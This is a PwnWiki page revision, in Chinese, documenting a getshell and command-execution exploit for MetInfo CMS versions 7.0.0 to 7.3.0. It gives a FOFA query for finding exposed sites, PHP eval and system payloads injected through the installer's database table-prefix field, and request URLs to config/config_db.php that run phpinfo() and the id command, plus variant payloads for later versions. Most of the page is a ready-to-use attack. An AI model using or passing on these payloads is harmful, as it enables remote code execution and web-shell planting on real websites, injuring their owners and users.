Difference between revisions of "米拓建站系統 getshell&命令執行漏洞"
From PwnWiki
(Created page with "<languages /> ==FOFA== <pre> body="MetInfo" </pre> <translate> ==影響版本== </translate> 7.3.0- 7.0.0 <translate> ==漏洞利用== </translate> <translate> 在安裝該...") |
(Marked this version for translation) |
||
| Line 6: | Line 6: | ||
<translate> | <translate> | ||
| − | ==影響版本== | + | ==影響版本== <!--T:1--> |
</translate> | </translate> | ||
7.3.0- 7.0.0 | 7.3.0- 7.0.0 | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:2--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
在安裝該CMS - 【設置數據庫信息(數據表前綴)】: | 在安裝該CMS - 【設置數據庫信息(數據表前綴)】: | ||
</translate> | </translate> | ||
| Line 20: | Line 21: | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
代碼執行Payload: | 代碼執行Payload: | ||
</translate> | </translate> | ||
| Line 28: | Line 30: | ||
<translate> | <translate> | ||
| + | <!--T:5--> | ||
命令執行payload: | 命令執行payload: | ||
</translate> | </translate> | ||
| Line 35: | Line 38: | ||
<translate> | <translate> | ||
| + | <!--T:6--> | ||
點擊保存進行下一步驗證,出現報錯信息 | 點擊保存進行下一步驗證,出現報錯信息 | ||
</translate> | </translate> | ||
| Line 40: | Line 44: | ||
<translate> | <translate> | ||
| + | <!--T:7--> | ||
(這裏的Payload是代碼執行) | (這裏的Payload是代碼執行) | ||
| + | <!--T:8--> | ||
訪問以下url: | 訪問以下url: | ||
</translate> | </translate> | ||
| Line 49: | Line 55: | ||
<translate> | <translate> | ||
| + | <!--T:9--> | ||
可以看到成功執行了phpinfo | 可以看到成功執行了phpinfo | ||
</translate> | </translate> | ||
| Line 54: | Line 61: | ||
<translate> | <translate> | ||
| + | <!--T:10--> | ||
(這裏的Payload是命令執行) | (這裏的Payload是命令執行) | ||
| + | <!--T:11--> | ||
訪問以下URL: | 訪問以下URL: | ||
</translate> | </translate> | ||
| Line 63: | Line 72: | ||
<translate> | <translate> | ||
| + | <!--T:12--> | ||
成功執行id命令。 | 成功執行id命令。 | ||
</translate> | </translate> | ||
| Line 68: | Line 78: | ||
<translate> | <translate> | ||
| − | ==其他== | + | ==其他== <!--T:13--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
Latest revision as of 11:06, 2 July 2021
FOFA
body="MetInfo"
影響版本
7.3.0- 7.0.0
漏洞利用
在安裝該CMS - 【設置數據庫信息(數據表前綴)】:
代碼執行Payload:
"/@eval($_GET['1']);/
命令執行payload:
"/@system($_GET['1']);/
點擊保存進行下一步驗證,出現報錯信息
(這裏的Payload是代碼執行)
訪問以下url:
http://<target>/config/config_db.php?1=phpinfo();
可以看到成功執行了phpinfo
(這裏的Payload是命令執行)
訪問以下URL:
http://<target>/config/config_db.php?1=id();
成功執行id命令。
其他
Version 7.10 Payload:"/@eval($_GET['1']);@system($_GET['2']);/
Version 7.20 Payload: "/@eval($_GET['1']);@system($_GET['2']);/